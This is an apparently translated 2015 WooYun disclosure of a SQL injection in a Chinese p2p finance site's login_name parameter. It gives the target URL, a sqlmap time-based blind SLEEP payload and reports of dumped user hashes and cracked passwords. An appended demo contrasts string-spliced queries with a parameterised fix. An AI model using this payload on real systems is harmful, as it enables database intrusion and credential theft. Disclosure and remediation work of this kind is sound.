
Vulnerability summary

Defect ID: wooyun-2015-0130128

Title: p2p finance site Puyi Wealth has a dba-privilege SQL injection vulnerability (a large amount of database user information can be obtained)

Vendor: pywm.com.cn

Author: littelfire

Submitted: 2015-08-03 16:47

Fixed: 2015-09-18 11:16

Published: 2015-09-18 11:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-03: Details sent to the vendor, awaiting vendor handling
2015-08-04: Vendor confirmed; details disclosed to the vendor only
2015-08-14: Details disclosed to core white hats and relevant domain experts
2015-08-24: Details disclosed to regular white hats
2015-09-03: Details disclosed to intern white hats
2015-09-18: Details disclosed to the public

Brief description:

The p2p finance site Puyi Wealth has a SQL injection vulnerability through which a large amount of database user information can be obtained.

Detailed description:

The p2p finance site Puyi Wealth has a SQL injection vulnerability through which a large amount of database user information can be obtained.
http://member-center.pywm.com.cn/

Proof of vulnerability:

Injection URL: http://member-center.pywm.com.cn/customer/get_login_pass.ajax.php?login_name=%E6%89%8B%E6%9C%BA%E5%8F%B7%E7%A0%819988%bf
The injection point is the login_name parameter. sqlmap output:

Parameter: login_name (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: login_name=%E6%89%8B%E6%9C%BA%E5%8F%B7%E7%A0%819988%bf' AND (SELECT * FROM (SELECT(SLEEP(5)))XfmR) AND 'yjbk'='yjbk


Checked the privilege of the injected session: it is dba.

[screenshot 6.jpg]


Listed the databases and the current database.

[screenshots 7.jpg, 8.jpg]


Dumped the database users: 73 database users were found, most of them with public-Internet hosts.

[screenshot 5.jpg]




Dumped the password hashes of more than 10 database users.

[screenshot 2.jpg]




Cracked the passwords of two users.

[screenshot 9.jpg]

Fix recommendation:

Apply proper input filtering.
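As an added illustration (not code from this report or from pywm.com.cn), the constructed Python/SQLite snippet below contrasts the vulnerable query pattern behind a login_name lookup with the parameterised fix, using the SLEEP() subquery shape from the sqlmap payload above. SQLite has no SLEEP(), so a stub records whether it was reached without stalling; the table, login name and e-mail are made up, and the login name is one that exists in the table so the AND chain is actually evaluated.

```python
import sqlite3

# Constructed sample: the payload shape from the report's sqlmap output, prefixed with a
# login name that exists in the demo table so the AND chain is actually evaluated.
PAYLOAD = "13800000000' AND (SELECT * FROM (SELECT(SLEEP(5)))XfmR) AND 'yjbk'='yjbk"


def open_demo_db():
    """In-memory SQLite stand-in for the member-center database (constructed)."""
    db = sqlite3.connect(":memory:")
    sleep_calls = []
    # SQLite has no SLEEP(); this stub records the call and returns 0, as MySQL's SLEEP()
    # does after the delay. Reaching it is the only signal a time-based blind probe gets.
    db.create_function("SLEEP", 1, lambda secs: sleep_calls.append(secs) or 0)
    db.execute("CREATE TABLE customer (login_name TEXT, email TEXT)")
    db.execute("INSERT INTO customer VALUES ('13800000000', 'user@example.com')")
    return db, sleep_calls


def find_email_vulnerable(db, login_name):
    """Vulnerable pattern: the GET parameter is spliced into the SQL text."""
    sql = "SELECT email FROM customer WHERE login_name = '" + login_name + "'"
    return [row[0] for row in db.execute(sql)]


def find_email_fixed(db, login_name):
    """Fixed pattern: a bound parameter; the value travels as data and is never parsed as SQL."""
    sql = "SELECT email FROM customer WHERE login_name = ?"
    return [row[0] for row in db.execute(sql, (login_name,))]


def run(lookup, login_name):
    """Run one lookup on a fresh database; report the rows and whether SLEEP() was reached."""
    db, sleep_calls = open_demo_db()
    try:
        rows = lookup(db, login_name)
    finally:
        db.close()
    return {"rows": rows, "sleep_called": bool(sleep_calls)}


if __name__ == "__main__":
    for name, fn in (("vulnerable", find_email_vulnerable), ("fixed", find_email_fixed)):
        print(name, "normal input:", run(fn, "13800000000"))
        print(name, "payload input:", run(fn, PAYLOAD))
```

With the payload, the vulnerable lookup reaches SLEEP() and returns no rows (the delay is the only observable), while the fixed lookup compares the whole string as a literal and SLEEP() is never reached.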

Copyright notice: when reposting, please credit the source: littelfire@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2015-08-04 11:15

Vendor reply:

Impact caused by a function that has already been deprecated

Latest status:

None